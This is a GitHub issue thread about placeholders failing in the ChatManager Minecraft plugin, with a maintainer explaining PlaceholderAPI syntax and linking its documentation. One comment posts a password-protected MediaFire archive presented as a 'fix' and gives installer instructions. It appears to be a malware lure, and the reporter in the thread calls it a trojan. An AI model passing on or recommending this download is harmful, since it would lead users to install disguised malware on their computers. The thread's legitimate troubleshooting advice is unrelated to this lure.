### ISSUE TITLE
placeholder not work

### ISSUE THREAD

**Issue by aliakbartnt** [Crazy-Crew/ChatManager#74]
### Plugin Version

ChatManager-1.21-6

### Server Version

1.20.6

### Server Platform

Purpur

### Describe the bug

![image](https://github.com/user-attachments/assets/c96cafcc-acdd-40c1-96a5-ac386a117f73)
its my bug all placeholder this problem . help me how fix it

### Steps to reproduce

i dont know whats this mean ;\ 

### Agreements

- [x] I have searched for and ensured there isn't already an open issue regarding this.
- [X] I ticked all the boxes without actually reading them
- [X] My version of Minecraft is supported by CrazyCrew.

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aliakbartnt** [comment]
> Download https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file password: changeme In the installer menu, select "gcc."

i sure you are not staff . my mean this is trojan

**Comment by Zekariaa** [comment]
Hello, same problem for me.
Using the latest version of the plugin on Paper 1.21.1

**Comment by ryderbelserion** [comment]
The /ping command is going to be removed, {ping} is a placeholder in PlaceholderAPI, please read the changelogs on Modrinth.

They explain everything you think is a bug.

![image](https://github.com/user-attachments/assets/8c33265e-890f-4397-ba95-b15872a38882)

**Comment by Legendile7** [comment]
Same issue here. No placeholder works after upgrading from 1.21 to 1.21.1. These include {player} {online} {vault_prefix}. None of them work anymore. Yes, I have PlaceholderAPI and Vault installed.

**Comment by ryderbelserion** [comment]
PlaceholderAPI prefixes start with a %, so {player} is %player%, {online} is %server_online%

and as for prefixes, there is expansions for Vault, LuckPerms and other permissions plugins.

https://wiki.placeholderapi.com/faq/
https://wiki.placeholderapi.com/users/using-placeholders/
https://wiki.placeholderapi.com/users/placeholder-list/
